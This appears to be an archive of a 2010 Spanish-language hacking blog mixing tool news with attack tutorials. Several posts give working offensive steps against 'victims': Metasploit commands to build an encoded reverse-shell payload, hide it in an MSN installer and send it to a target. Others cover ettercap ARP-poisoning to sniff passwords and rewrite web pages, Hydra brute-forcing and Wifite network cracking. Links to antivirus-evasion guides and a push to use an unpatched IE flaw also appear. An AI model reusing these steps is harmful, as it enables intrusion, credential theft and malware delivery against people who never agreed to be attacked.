28 dic 2010

[0Day] Todas las Versiones de Internet Explorer Afectadas (Cómo Explotarlo con Metasploit)

Bueno mis amigos, esta vulneravilidad es super nueva, y todavía no es parchada oficialemte por el equipo de Microsoft, así que apurence en usarla XD.

No voy a entrar a especificar como funciona la vulnerabilidad en sí ni les voy a ser perder su tiempo leyendo sobre la criticidad del bug (es muy crítico) ni sus repercuciones, así que al grano:

24 dic 2010

En Poco Tiempo más los Juegos FPS serán así xD

Bueno chicos... Me aburrí de subir cosas útiles XD, aquí un regalito, véanlo es muy bueno ;)




[+] Salu2
[+] ZioneR

21 dic 2010

[D0z.me Please] Un acortador de URL que genera DDoS

Si bien esto no es un concepto nuevo ni se trata de una herramienta sofisticada, es conceptualmente interesante, ya que sólo requiere un navegador para ejecutar una parte de un ataque DoS y todo lo que se requiere es tener activado Javascript para que funcione en los navegadores de los participantes.

Con eso en mente un estudiante de la Universidad de Tulsa creo D0z.me, una Prueba de Concepto (PoC) de un acortador de URL que, además de ofrecer ese servicio, ataca (secretamente) a un servidor arbitrario. El autor también ha publicado el código fuente de la herramienta.

20 dic 2010

[Video] Armitage by Raphael Mudge

Para aquellos que le llamó la atención o les gustó Armitage, recientemente el creador de ésta interfaz gráfica de Metasploit, Raphael Mudge, asistió a una conferencia de Seguridad informática NoVA Hackers donde presentó más a fondo la herramienta y volvió a hacer una demostración de sus usos.

Entrar a Windows 7 Saltándose la Contraseña

Este es un método para entrar en sistemas Windows un poco antiguo y bastante sencillote y agresivo. Sin embargo, a lo largo de las versiones de Windows no han parcheado nunca y, de hecho, poca documentación es la que he encontrado al respecto.

Normalmente, para entrar en una máquina Windows sin tener autorización para ello, era necesario saber las contraseñas, ya sean del usuario o de administrador, esto se hacía “a mano” o con distribuciones de Linux especificas y con la ayuda de alguna tabla Rainbow. Otra forma era utilizar Kon-Boot para parchear el proceso de autenticación en memoria.

17 dic 2010

[GIE 4.8] General Injection Explorer 4.8

Después de unas 2 semanas de ausencia, me encuentro con que han publicado la versión 4.8 de la magnífica herramienta GIE que ya documenté de la versión 4.7 (Por favor hacer click aquí si no saben como funciona la herramienta) que está off hace ya un tiempo. Ahora PonyMagic realizó una nueva versión mejor y  con más características:

29 nov 2010

[Armitage] Administrador Gráfico de Cyber Ataques para Metasploit

Armitage es un Administrador Gráfico de Cyber Ataques para Metasploit que sirve para visualizar gráficamente tus objetivos, el mismo programa te recomienda que exploit usar, expone las opciones avanzadas del framework (esas que comúnmente se nos olvida o no sabemos), desde el mismo Armintage podemos iniciar un análisis con Nmap, e incluso se puede usar el módulo de Brute Force para sacar username/password.

[Video] Viendo por la Webcam con Metasploit



El video está muy bien explicado así que no lo voy a explicar ;)

Autor: DarkSpark

25 nov 2010

24 nov 2010

"Se redefinirá la historia mundial"



 

"The coming months will see a new world, where global history is redefined. Keep us strong."


"En los próximos meses verán un mundo nuevo, donde se redefinirá la historia mundial. Mantenernos fuertes."


23 nov 2010

Cómo instalar un control de Xbox 360 en Windows XP

Era recurrente la pregunta de cómo instalar el control de Xbox 360 en el pc y hacer que vibre con los juegos, se hizo esta mini-guía con el método que resultó el más fácil de todos los que se encuentran en la red.

Primero que todo, están en Rapidshare los archivos necesarios para poder instalar correctamente el control. Es un conjunto de 4 archivos:

21 nov 2010

[Video] Cómo funciona SpyEye

SpyEye es el nuevo kit de creación de botnets que está recogiendo el exitoso testigo de Zeus. Se trata de un troyano bancario 2.0 que se vende en los entornos "underground" y que permite a un atacante crear de forma muy sencilla una botnet y recopilar datos sensibles de sus víctimas. En el vídeo se demuestra lo sencillo que sería para un atacante crear este troyano.

Guía para borrar datos de un dispositivo móvil

Como mencionamos en repetidas ocasiones, el manejo de la información y los datos son temas sensibles, y pueden exponer al dueño de estos ante situaciones no deseadas. Es por ello que con el boom de los smartphones se debería de tomar  mayor conciencia de qué datos podemos entregar cuando vendemos, cambiamos o dejamos de lado nuestro equipo por otro nuevo.

[Indetectando Malware] Método FakeProc

Bueno, hace mucho tiempo leyendo en indetectables.net me encontré con un tutorial para Indetectabilizar Malware, decidí subirlo porque nunca está demás... este es un tutorial en PDF donde explican un método para Indetectabilizar un Malware (Virus, Worm, Troyano, Joke, Bot, etc...) modificando el código fuente para confundir a los antivirus con buncles muy extensos. Sin duda anecdótico, pero útil:

16 nov 2010

[SqlInjector v1.0.2] Herramienta para Blind SQL injection

SqlInjector es una aplicación para realizar Blind SQL injection. Actualmente es compatible con MS SQL Server. Utiliza inferencia basadas en el tiempo para determinar las condiciones verdaderas o falsas para extraer los datos. La característica clave es que utiliza un mecanismo de búsqueda binaria para reducir la búsqueda de espacio de direcciones, esto significa que puede obtener cada valor de carácter dentro de 7 a 8 solicitudes.

[SET] The Social-Engineer Toolkit

The Social-Engineer Toolkit mas conocido como SET, es un conjunto de herramientas especialmente diseñadas para realizar ataques de Ingeniería Social en procesos de auditorias en seguridad, esta programado en Python por David Kennedy (ReL1K), quien hace poco publicó su versión 1.0 con grandes cambios.

[PenTBox v1.4] Nueva versión de esta suite de herramientas de seguridad

PenTBox es una suite de herramientas de seguridad multiplataforma, libre (GNU/GPLv3) y escrita en Ruby. El proyecto ha ido evolucionando, se han incluido módulos, salieron más versiones beta y la primera versión final.

¡Hoy os presentamos la segunda versión final!

Entre las mejoras y novedades que incluye se encuentran las siguientes:

9 nov 2010

Instalar Android 2.2.1 Froyo en iPhone 3G / 2G (Sin la necesidad de un computador)

Probablemente la forma más fácil de la mayoría para instalar Android en un iPhone 2G / 3G es a través de iPhoDroid , que cubría anteriormente. Pero el problema es que se debe tener un equipo para ejecutar todo el proceso de instalar Android en el iPhone 2G/3G. Pero gracias a Bootlace 2.1, ahora se puede instalar Android 2.2.1 Froyo en un iPhone con jailbroken sin necesidad de conectarlo a un PC o Mac!


8 nov 2010

[Cheat Sheets] Guía de comandos rápida Linux

En www.retronet.com.ar, lwayar realizó un excelente Cheat Sheets (una referencia rápida) con los comando esenciales de Linux.
"Como parte de mi actividad docente en la Universidad Nacional de Jujuy, escribo una Guía de Referencia Rápida de comandos Unix/Linux para que sirva de apoyo y consulta para los estudiantes, no pretende ser un detallado manual sino un documento simple y de rápida consulta donde esta los comandos separados por tipo y propósito. Espero que le sea de utilidad, el documento seguramente sera ampliado y corregido."
Luis Tomás Wayar

¿Cómo protegerme de Firesheep?

Mucho se está hablando sobre Firesheep, el último hype que ha saltado a la primera fila informativa poniendo de manifiesto algo de lo que se llevaba hablando en foros mas específicos desde hace tiempo (la inseguridad de muchos servicios web por no implementar SSL correctamente).

Como mucha gente se ha interesado en el tema y en concreto por como protegerse, vamos a responder de una forma lo mas concisa posible a la pregunta de como defenderse contra Firesheep y en general contra ataques que impliquen 'sniffing' de red:

3 nov 2010

[Metasploit Pro] Lanzada la versión de Metasploit de pago

El pasado martes 19 de octubre apareció la noticia del lanzamiento de la suite de seguridad más famosa en su versión comercial, Metasploit Pro 3.5. Entre las nuevas características, destacan la habilidad de identificar, auditar y explotar aplicaciones web, lanzar campañas de ingeniería social a gran escala, evasión de antivirus e IDS, trabajo colaborativo y generar informes personalizados. Además, Metasploit Pro permite hacer VPN Pivoting en capa 2, lo cual nos crea una interfaz virtual dentro de la red remota desde la que poder lanzar cualquier herramienta de seguridad. 

29 oct 2010

[Firesheep] Complemento de Firefox para robar contraseñas de una red Wifi abierta

Bueno... Hace poco en se publicó en Toorcon 12 el polémico complemento de Firefox, Firesheep, y digo polémico porque en muchas webs se a tratado este complemento como una herramienta magníficamente efectiva en su misión de conseguir contraseñas (especialmente de Facebook, Twitter, etc...).

La verdad es que lo que hace esta herramienta antes también se podía hacer de un "modo manual" y más complicado para aquellos que no tienen conocimiento amplio de informática (Hacking), pero con Firesheep esta tarea queda reducida a simplemente instalar dicho complemento, abrir Firefox y listo!

25 oct 2010

[Metasploit 3.5] Ya salió la nueva versión de este magnífico Framework

Luego que se cumpla el primer aniversario de la adquisición del proyecto Metasploit por parte de Rapid7, se anunció el lanzamiento de la nueva versión del Metasploit Framework, 3.5.0, con 613 exploits y cientos de bugs corregidos, ofreciendo mayor estabilidad y agregando nuevas funcionalidades. Por ejemplo ahora Meterpreter también se encuentra disponible para Windows de 64 bits.

Esta nueva versión incluye mayor funcionalidad con la nueva GUI en JAVA Scriptjunkie, en reemplazo de la ya vieja msfgui. Desde esta nueva interfaz ahora se puede controlar Nessus, VMWare.

Se han ampliando la posibilidad de importación de bases de datos de Retina y de Netsparker y ahora además se puede exportar a XML con el mismo comando db_export de siempre.

Para más detalle consulten la lista de cambios de la versión 3.5.

Pero lo más importante, tal y como se prometió, Metasploit Framework seguirá siendo gratuito y todavía se encuentra disponible bajo la misma licencia BSD.

Instalación Metasploit
GUI Metasploit

Descarga:

framework-3.5.0.exe
233,456,857 bytes (223M)
Windows installer including Java, PostgreSQL, Console2.
[ PGP ] SHA1: 04ba0f4cfd0f19d196c7e0cff3ca50da25876d97
framework-3.5.0-linux-i686.run
42,254,784 bytes (42M)
Linux 32-bit installer including all dependencies.
[ PGP ] SHA1: c17badf0aaf209c6d6ea9069b97aecde4130e732
framework-3.5.0-mini-linux-i686.run
23,749,783 bytes (23M)
Miniature Linux 32-bit installer including all dependencies.
[ PGP ] SHA1: 17c07f29c5923ab81c10458a874d38aa3483fcf1
framework-3.5.0-linux-x86_64.run
61,889,801 bytes (60M)
Linux 64-bit installer including all dependencies.
[ PGP ] SHA1: 3695d05b29b16a928b766b6cf2b207dde39cfe98
framework-3.5.0.tar.bz2
42,254,784 bytes (41M)
Unix tar format for installing on all other operating systems.
[ PGP ] SHA1: 15e72afdfdc374f74a6eb07969174855b6d02361

Leer más en: Blog de Metasploit

19 oct 2010

[XSSF] Usanso Metasploit para explotar un XSS


Aquí les dejo un video donde muestran como atacar un posible XSS con una nueva herramienta de Metasploit: XSSF. XSSF es un Framework que corre adentro de Metasploit. Nos permite tratar con las víctimas de un ataque XSS y mantener enlace con ellos para futuros ataques. El video finaliza cuando se logra obtener acceso a la víctima del XSS. Recomiendo 100% el video:



Bueno, y en este video se muestra se hace un túnel XSS con la víctima,lo que permite al atacante usar el dominio vulnerable como si estuviera en lugar de la víctima. Para entender mejor vean el video:



Con estos 2 videos nos podemos dar cuenta del verdadero poder de un XSS, ya que es muy común creer que con un XSS solo se puede robar cookies. Con XSSF se nos abre una gamma mucho más amplia de lo que se puede hacer con un XSS.

Añadir XSSF a Metasploit
  1. Descargamos XSSF.zip de la web oficial:  XSSF.zip
  2. Descomprimimos las 4 carpetas que hay adentro (data, lib, modules, plugins) las pegamos en la carpteta msf3, en Windows generalemte es C:\Archivos de programa\Metasploit\Framework3\msf3.
  3. Partir la consola de Metasploit como siempre.
Más información en la web oficial: http://www.metasploit.com/redmine/issues/2995... Recordar que todavía no se agrega XSSF al actualizar Metasploit, pero tengo la fe que en posteriores versiones venga incluido.

[+] Salu2
[+] ZioneR

17 oct 2010

¿¿ Qué tan Segura es tu Contraseña ??

Esta entrada la dedico a http://howsecureismypassword.net/ que nos dice que tanto de demorarían en crackear mi contraseña, simplemente ingresan su contraseña de uso común y verán que tan fácil o difícil es crackearla... Esto es muy útil a proposito de los ataques por fuerza bruta (como THC-Hydra, Brutus AET2, etc...) que muchas veces resulta inútil debido a las buenas contraseñas usadas.


Desde ya les recomiendo que si ponen su contraseña y aparece menos de 3 días, No la usen más XD.

How Secure Is My Password?


[+] Salu2
[+] ZioneR

13 oct 2010

Taller Shell, comandos y programación


De mano de 4party traigo un excelente taller de Shell en Linux, Una muy buena reseña de los Comandos de Linux y un Manual de Programación de scripts shell todo en uno, sin duda que lo recomiendo:
Este guía no es para leer de forma seguida, este guía pretende ser una referencia de comandos Unix/Linux y de programación de scripts de shell que se pueda consultar en cualquier momento. No pretende ser una guía exhaustiva, sino una referencia que sirva como recordatorio de los comandos más utilizados.

¿Y qué es Linux?
Los sistemas operativos del tipo Linux esta formado por procesos y ficheros. Y no hay nada más. Los dispositivos como el disco, el cdrom, la pantalla, esta representado como un fichero en el sistema linux, dentro de /dev. Los sockets de comunicación son ficheros. Los directorios son ficheros. Los ficheros son ficheros.
Iñigo Tejedor

Índice de contenido:
1.INTRODUCCIÓN.................................................................3
El mapa de ficheros y directorios en linux.....................................4
2.El shell.....................................................................5
Buscar ayuda...................................................................5
3.Guía de comandos.............................................................6
Comandos básicos y manejo de ficheros..........................................6
Comandos de administración: usuarios, procesos, kernel.........................9
Comunicaciones.................................................................10
Comunicación entre procesos....................................................12
Redirección de entrada/salida..................................................12
Compresión de ficheros y directorios...........................................13
Accediendo a dispositivos y particiones........................................14
4.Usando el shell..............................................................16
Las flechas....................................................................16
El historial de comandos.......................................................16
Relleno de comandos y ficheros.................................................17
Comodines......................................................................18
Ejecución de comandos..........................................................18
Comandos en segundo plano......................................................19
5.Programación de scripts de shell.............................................22
Introducción ..................................................................22
Variables......................................................................23
arrays.........................................................................24
Otros usos.....................................................................24
Operaciones....................................................................25
Aritméticas....................................................................25
Lógicas........................................................................26
Condicionales..................................................................27
case...........................................................................30
Iteraciones....................................................................31
for............................................................................31
while..........................................................................32
until..........................................................................33
select.........................................................................34
Funciones......................................................................34
Librerías......................................................................35
Señales........................................................................36
Colores........................................................................36
6.Bibliografía, referencias y enlaces..........................................38

Descarga "Taller Shell, comandos y programación"
Formato: PDF
Páginas: 38
Peso: 260 KB

Fuente: http://4party.cuatrovientos.org/

9 oct 2010

[Wifite] Ataca múltiples redes WEP y WAP al mismo tiempo

Wifite es una herramienta diseñada para Backtrack4 RC1 (distribución de Ubuntu). Wifite Solamente cuenta con soporte para Linux  y no lo tiene para Windows o Osx.

El propósito de esta herramienta es atacar multiples  redes WEP y WAP al mismo tiempo, automatizandola con pocos argumentos para que trabaje sola.
Modo Gui
Las principales características son que trae numerosos filtros para especificar exactamente qué atacar (WEP/WPA/both, por encima de ciertas intensidad de señal, por canales, etc), se puede personalizar tiempo de espera, paquetes/segundos, ignorar fake-auth.


Trae una opción anonymous que cambia la MAC al azar antes de atacar, y cuando termina de atacar se vuelve a cambiar.

Se hace un backup con todos los handshakes captados en un archivo en el directorio donde se encuentra wifite.py aparte que se guardan todas las contraseñas crackeadas en el archivo log.txt.

Wifite viene en version GUI y versión consola:
Modo consola
Algunos ejemplos en el modo consola son:

Crackear todos los puntos WEP:
./wifite.py -all -nowpa

Crackear todos los puntos WEP con señal mejor que (o igual que) 50 dB:
./wifite.py -p 50 -nowpa

Atacar todos lo puntos de acceso, usando 'darkc0de.lst' para crackear los handshakes WPA:
./wifite.py -all --dict /pentest/passwords/wordlists/darkc0de.lst

Atacar todos los puntos WAP, pero no crackearlos (los handshakes se guardan automáticamente):
./wifite.py -all -nowpa --dict none

Crackear todos los puntos WEP con señal mejor que (o igual que) 50 dB, dando 15 minutos para cada método de ataque WEP, y enviando 600 paquetes/sec:
./wifite.py --power 50 -wepw 15 -pps 600

Para tratar de romper la red "2WIRE752" encriptada en WEP, sin detenerse hasta que sea crackeada o interrumpida por el usuario con CONTROL + C:
./wifite.py -e "2WIRE752" -wepw 0

Descarga de wifite.py

Más Información y web del proyecto es: http://code.google.com/p/wifite/

Eso sería...
[+] Salu2
[+] ZioneR

8 oct 2010

[THC-Hydra] Tutorial (explicación modo de uso) + Video

Me han pedido mucho tutoriales para usar el conocido programa Hydra, y claro, existe muy poca documentación de uso del programa debido a su fácil manejo.

Bueno... THC-Hydra es un archi conocido Software que intenta crakear por fuerza bruta la contraseña de una cantidad impresionante de protocolos: TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC,RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP, LDAP2, Cisco AAA (incorporado en el módulo de Telnet).

Su éxito se debe a un algoritmo que asegura ser el más eficiente (?) y rápido (?) en este tipo de ataques. Hoy en día THC-Hydra cuenta con su versión 5.8 y tiene soporte tanto para Linux (linea de comandos y GUI) y Windows (sólo como comando).

Aquí se verá un video de como crackear por fuerza bruta la contraseña de un FTP, ya sabiendo el nombre de usuario y usando un diccionario de contraseñas:




El uso básico de Hydra es:
hydra -l user -P diccionario.txt -vV 192.0.0.1 ftp

Sentencias Elementales:
  • -l Es el nombre de usuario, si se usa en mayúscula (-L) se puede poner un diccionario (*.txt) con usuarios (muy práctico cuando no se sabe el usuario) [-l admin] [-L admin.txt].
  • -p Se pone el password, si se usa en mayúscula (-P) se puede poner un diccionario de passwords (es lo más lógico usar esta opción) [-p password] [-P diccionario.txt].
  • -v Es el verbose mode que imprime en pantalla los intentos de usarios-password, si se usa con mayúscula (-V) Hydra nos dará más detalles del proceso de crackeo [-v] [-vV].
  • 192.0.0.1 Esto se remplaza por el IP de nuestro objetivo [IP/host].
  • ftp El protocolo al cual se ataca, puede ser todos los mensionados arriba (ftp, telnet, pop3, snmp, etc...) [protocolo].

Luego de eso empezaría el largo proceso de crackear una contraseña por fuerza bruta, y rezar para que el password se encuentre en el diccionario.txt o estamos perdidos.

Otras sentencias muy útiles:
  • -R esto restaura la sesión anterior que se nos haya caído (muy normal cuando nuestro pc no es muy bueno) o que hayamos abortado [-R].
  • -S se conecta por SSL [-S].
  • -s Se especifica un puerto por si no es el por defecto en el protocolo (ejemplo: telnet (23), ftp (21), smtp (25), etc...) [-s 4450].
  • -C Esta sentencia se usa eliminando -l/-L y -p/-P ya que aquí se especifica un diccionario combo, osea que tenga tanto usuario como contraseña con el formato user:pass [-C diccionario-combo.txt].
  • -o Esto es muy útil ya que nos ira dejando en un documento que nosotros especifiquemos todas las contraseñas y usuarios que vaya sacando [-o output.txt].
  • -f Se cierra Hydra después de encontrar el primer password [-f].
  • -w Con este se puede especificar el tiempo máximo (en segundos) que queramos que este crackeando passwords [-w 9999999].
  • -t Este es uno de los más útiles si es que cuentas con un computador con buenas características y buena banda ancha, ya que permite cambiar la cantidad de contraseñas/passwords que se crackean en paralelo que son 16 por defecto [-t 32].

Y nunca está demás el mejor de todos, la mejor sentencia de la mayoría de los comandos:
  • -h nos brindará la ayuda principal del comando [-h] [--help].

    Bonus: Buenos diccionarios de contraseñas.

    Web oficial de Hydra: http://freeworld.thc.org/thc-hydra/

    [+] Salu2
    [+] ZioneR

    6 oct 2010

    [Videos] Aprende A Programar En Python desde 0

    Aquellos que quieran aprender a programar en Python que es uno de los lenguajes mas usados hoy en día y favorito de muchos hackers por ser un lenguaje de programación amigable.

    En estos videos de enseña desde cero a programar en Python bajo un sistema operativo windows, son muy didácticos, muy entendibles (incluso para alguien que nunca a programado) y lo mejor de todo es que están en español, los videos que mostraré a continuación están realizados por juh:

    Programando En Pyhton - 1 instalación de pyhton y py2exe


    Programando en python - 2 Operadores simples


    Eso son los 2 primeros videos, si quieren ver los demás pueden hacerlo vía el canal de Youtube (lo recomiendo por si siguen subiendo más videos) o desde estos links:

    Programando en pyhton - [1] instalacion de pyhton y py2exe:
    Programando en python - [2] Operadores simples
    Programando en python - [3] Variables
    Programando en python - [4] Módulos y Funciones
    Programando en python - [5] Escribiendo y Guardando Nuestro Primer Programa + Compilar Binario
    Programando en python - [6] Comillas y Variables
    Programando en python - [7] Convirtiendo a variable cualquier carácter
    Programando en pyhton - [8] Diferecia entre input y raw_input
    Programando en pyhton - [9] Secuencia y listas
    Programando en python - [10] Deslices en listas
    Programando en pyhton - [11] Mas sobre listas y variables
    Programando en pyhton - [12] Funciones en listas
    Programando en python - [13] Deslices en listas 2
    Programando en python - [14] Introducion a metodos
    Programando en python - [15] Mas sobre metodos
    Programando en python - [16] Tuplas

    Canal de Youtube

    [+] Salu2

    2 oct 2010

    Ataques XSS con javascript por diversión y beneficio

    Este es un excelente tutorial donde explican bastante bien este tipo de vulnerabilidades:

    De las muchas vulnerabilidades que podemos encontrar en las aplicaciones Web una de las más comunes es el XSS o Cross-Site-Scripting. Consiste esencialmente en introducir código en páginas web para que lo ejecute cualquiera que acceda a ellas.

    Aunque es relativamente fácil protegerse ante estos ataques, existen muchas maneras de saltarse filtros. En este taller se probaran distintas diversiones con javascript, desde el hola mundo a cosas más complejas.
    Pello Xabier Altadill – Instituto Cuatrovientos


    Tabla de contenidos:
    Ataques XSS con javascript como diversión y beneficio .......................1
    (0). Escenario y primera prueba .............................................2
    (1). Hola mundo .............................................................3
    (2). Dando por el culo con alerts ...........................................4
    (3). Vámonos de aquí ........................................................5
    (4). Jugando con el objeto window ...........................................6
    (5). Solicitando datos al usuario ...........................................7
    (6). Capturando eventos .....................................................8
    (7). Robo de cookies y sesiones .............................................10
    (8). Session Ridding ........................................................11
    (9). Adueñandonos del documento a través de DOM .............................12
    (9.1). ¿Qué es eso del DOM? .................................................12
    (9.2). Leer, modificar, añadir, reemplazar y eliminar .......................13
    (10). AJAX: una nueva era ...................................................18
    (10.1). Mandando datos por lo bajini ........................................19
    (10.2). Mandando datos fuera ................................................23
    (10.3). Snifando datos ......................................................24
    (11). Formas de introducir XSS ..............................................25
    Referencias, webs, artículos:................................................25

     Descargar [PDF] Ataques XSS con javascript por diversión y beneficio.

    Artículos relacionados:
    Todo Sobre XSS!!
    XSS a fondo

    Fuente: http://4party.cuatrovientos.org/

    5 Wallpapers para Linux útiles (con comandos básicos)

    Bueno.. para los que tiene mala memoria, aquí unos wallpapers hechos especiales para ellos:


    (1280 x 1024) 80,1 KB


    (1280 x 1024) 47,5 KB

    (1280 x 1024) 655 KB
    (2560 x 1600) 207 KB
    (2560 x 1600) 180 KB

    [+] Salu2

    30 sept 2010

    Manual básico Ettercap (entorno gráfico)

    Esta es una guia básica sobre la utilización de ettercap. Este programa que nos permite sniffar el tráfico de red y obtener  así las  contraseñas escritas por otros usuarios de nuestra red, además también permite leer, por ejemplo, las conversaciones del messenger u otros programas de mensajería instantánea.

    1 - Primero tenemos que descargar el ettercap, la ultima versión es la 0.7.3 y
    esta disponible tanto para windows como para linux:

    Windows:
    http://sourceforge.net/projects/ettercap/files/unofficial binaries/windows/

    Linux:
    http://ettercap.sourceforge.net/download.php

    o (en el caso de Ubuntu)
    # apt-get install ettercap-gtk

    2 - Lo instalamos.

    Si tienes la versión para compilar de linux:
    # ./configure
    # make
    # make install

    A partir de ahora lo interesante:

    3 - Arrancamos el ettercap (en caso de linux como root, ya que sino no nos permitira seleccionar la interfaz de red a utilizar).

    4 - Pestaña Sniff>Unified Sniffing

    5 - Seleccionamos la interfaz que esta conectada a la red que queremos sniffar,
    despues le damos a "Aceptar".

    6 - Pestaña Host>Scan for hosts.

    En la parte de abajo de la pantalla aparecerá algo como " X hosts added to the hosts list..."
    (X sera un numero correspondiente al numero de maquinas conectadas a la red).

    7 - Pestaña Host>Host list.

    Ahora aparecerán las IPs de las maquinas conectadas, hay que tener en cuenta que el router también aparece (No aparece nuestro PC).

    8 - Seleccionamos la IP del ordenador a atacar y pulsamos "Add to Target 1", después el router "Add to Target 2".

    Ahora ya tenemos los objetivos marcados, pero antes de dar el siguiente paso tenemos que tener en cuenta que vamos a utilizar una técnica llamada Man In The Middle (MITM) y lo que haremos sera que todos los paquetes que van dirigidos al PC atacado pasen por nosotros, con lo que si nosotros nos desconectamos sin detener el ataque MITM nuestra víctima se quedara sin conexión por un tiempo, mientras se reinician las tablas arp.

    9 - Pestaña Mitm>ARP Poisoning. Ahora marcamos la pestaña "Sniff remote connections" y pulsamos "Aceptar".

    10 - Pestaña Start>Start sniffing.

    Con esto estaremos snifando el trafico de red.

    11 - Pestaña  View>Connections. Aquí podemos ver todas las conexiones y hacemos doble click sobre alguna podemos ver los datos que contiene, entre ellos conversaciones del messenger, usuarios y contraseñas, etc.

    Ahora es cuestión de paciencia.

    Bueno un saludo a todos y espero que os sirva.

    Respeto a los filtros:

    Este filtro se utiliza para cambiar las imagenes de la maquina a la que le hayamos hecho el man in the middle.

    Primero tenemos que obtener el script del filtro, para esto vamos a la siguiente pagina y copiamos el script.


    El script es el siguiente:
    ############################################################################
    #                                                                          #
    #  Jolly Pwned -- ig.filter -- filter source file                          #
    #                                                                          #
    #  By Irongeek. based on code from ALoR & NaGA                             #
    #  Along with some help from Kev and jon.dmml                              #
    #  http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833              #
    #                                                                          #
    #  This program is free software; you can redistribute it and/or modify    #
    #  it under the terms of the GNU General Public License as published by    #
    #  the Free Software Foundation; either version 2 of the License, or       #
    #  (at your option) any later version.                                     #
    #                                                                          #
    ############################################################################
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!"); 
          # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
       replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
       msg("Filter Ran.\n");
    }

    Ahora modificamos la dirección de las imágenes por las que nosotros queramos, por ejemplo la de portalhacker.net, quedaría así:
    if (ip.proto == TCP && tcp.src == 80) {
    replace("img src=", "img src=\"http://foro.portalhacker.net/Themes/miembro/images/smflogo.gif\" ");
    replace("IMG SRC=", "img src=\"http://foro.portalhacker.net/Themes/miembro/images/smflogo.gif\" ");
    msg("Filter Ran.\n");
    }

    Lo siguiente sera guardar el script con extension .filter, por ejemplo imagen.filter.

    Una vez hecho esto abrimos una consola y vamos al directorio donde tenemos el imagen.filter. Una vez allí ponemos y se compilara el filtro:
    etterfilter imagen.filter -o imagen.ef

    Con esto nos generara el imagen.ef. Una vez creado lo copiaremos al directorio de ettercap
    /usr/share/ettercap

    Ahora arrancamos ettercap y realizamos el MITM. Durante el MITM vamos a la pestaña filters->load a filter.

    Una vez aquí seleccionamos el archivo imagen.ef y pulsamos aceptar. Con esto ya estar el filtro aplicado y las imágenes que vea la victima serán sustituidas por las que nosotros queramos.

    Autor: Aetsu

    28 sept 2010

    [Video] Escondiendo Meterpreter en un instalador de MSN

    Bueno... Recorriendo la web me encuentro con este video que es bastante simple y que explica muy bien como transformar un PAYLOAD a exe y como unirlo a un Instalador de MSN con Iexpress. Para luego enviárselo a la víctima y se conecte a nosotros gracias al PAYLOAD [windows/exploits/reverse_tcp] que crea una conexión inversa (osea que nuestra víctima se conecta a nosotros), lo que es muy práctico para evitar el firewall de Windows. Aquí el video, y luego procedo a explicar a los que no les haya quedado muy claro ya que el video está en inglés, pero muy fácil de entender:




    Primero se procede a crear el PAYLOAD con extensión *.exe:
    root@evilbox:~# cd /pentest/exploits/framework3/
    root@evilbox:/pentest/exploits/framework3# ./msfpayload windows/exploits/reverse_tcp LHOST=192.168.1.64 R | ./msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /root/payload.exe
    En LHOST=192.168.1.64 se tiene que poner nuestra IP ya que la victima se va a conectar a nosotros.

    En -o se pone la ruta donde se guardará el payload.exe, puede ser donde sea.

    Se deja corriendo en la consola metasploit:
    root@evilbox:/pentest/exploits/framework3# ./msfconsole

    Luego se procede a unir payload.exe con el instalador de MSN o en su defecto cualquier exe. No voy a entrar en detalles como usar Iexpress ya que en el video es muy claro.

    msf > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD windows/exploits/reverse_tcp
    msf exploit(handler) > set LHOST 192.168.1.64
    msf exploit(handler) > exploit
    Aquí lo único lo que hay cambiar es set LHOST 192.168.1.64 por nuestra IP, como ya expliqué antes. es para que nuestra víctima se conecta a nosotros.

    Corremos el exploit con el comando exploit (obvio no XD)

    Por último sólo nos queda enviar el "*.exe" (payload.exe + Instalador de MSN) a nuestra víctima y esperar que lo ejecute.

    Ahora tenemos el control absoluto desde nuesta consola del PC de tu víctima.

    [+] Salu2
    [+] ZioneR

    27 sept 2010

    SoftPerfect Network Scanner v5.0

    SoftPerfect Network Scanner es un escaner gratuito multi-threaded IP, escáner de NetBIOS y SNMP con una interfaz moderna y muchas características avanzadas. Está dirigido a administradores de sistemas y usuarios en general interesados en la seguridad informática. Contiene ping a computadoras, escáneres para escuchar en puertos TCP / UDP y muestra qué tipos de recursos compartidos están en la red (incluidos los ocultos y de sistema).
     
    Además, te permite montar carpetas compartidas como unidades de red, navegar por ellos utilizando el Explorador de Windows, filtrar la lista de resultados y mucho más. SoftPerfect Network Scanner también puede comprobar un puerto definido por el usuario e informar si se está abierto. También puede resolver nombres de host y la detección automática de un rango de IP local y externa. Soporta el apagado remoto y Wake-on-LAN.

    Principales características:

    • Pings a Computadoras y muestra los activos.
    • Detecta el hardware de direcciones MAC, incluso a través de routers.
    • Detecta las carpetas compartidas y los permisos de escritura.
    • Detecta las direcciones IP internas y externas.
    • Analiza en busca de puertos tcp en escucha, algunos de los servicios UDP y SNMP.
    • Recupera usuarios registrados, configuraciones de cuentas de usuario, el tiempo de actividad, etc
    • Usted puede montar y explorar los recursos de red.
    • Puede lanzar aplicaciones externas de terceros.
    • Se pueden exportar resultados a HTML, XML, CSV y TXT
    • Soporta Wake-On-LAN, apagado remoto y el envío de mensajes de red.
    • Recupera potencialmente cualquier información a través de WMI.
    • Recupera la información de registro remoto, sistema de archivos y gestor de servicios.
    • Es absolutamente gratis, no requiere instalación y no contiene adware/spyware/malware.

    Imágenes

    Ventana de explorador de la red principal, con algunos resultados del análisis.




    El escáner de red puede ser fácilmente configurado a las necesidades del usuario.





    Descarga SoftPerfect Network Scanner v5.0
    Latest version: 5.0 (Sep 27, 2010)
    Plataformas soportadas: Windows 2000, XP, 2003, Vista, 2008, Seven
    32-bit and 64-bit
    Licencia: Freeware

    Web Oficial: http://www.softperfect.com/

    [Video] Indetectando Malware by demonio666vip

    Bueno... la verdad es un método que tiene mucho tiempo, pero sin duda es muy interesante y fácil de llevar a cabo:




